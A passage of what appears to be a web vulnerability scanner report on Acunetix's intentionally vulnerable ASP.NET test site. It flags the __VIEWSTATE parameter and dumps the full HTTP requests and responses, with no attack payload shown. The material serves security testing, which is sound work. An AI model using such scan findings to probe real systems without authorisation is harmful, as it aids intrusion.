href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8150&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAiopOJtoIZGRkr4a5xT4rq4TOJK5539Ru049WXUo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLF64LxAQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPsv5TUuA9RD0MNTcr2Zt6a3pbAl4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:45:51 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAiopOJtoIZGRkr4a5xT4rq4TOJK5539Ru049WXUo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLF64LxAQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPsv5TUuA9RD0MNTcr2Zt6a3pbAl4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:White" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8166&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAJjHhMtoIZGRkdrzapZKAkKVLkw49IGsPxHVEovI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLRzOCpBQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esP%2B3BuhmTSxPH%2BsJ3abKF3TSLv9EA%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:27:10 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAJjHhMtoIZGRkdrzapZKAkKVLkw49IGsPxHVEovI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLRzOCpBQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esP+3BuhmTSxPH+sJ3abKF3TSLv9EA=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:White" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a 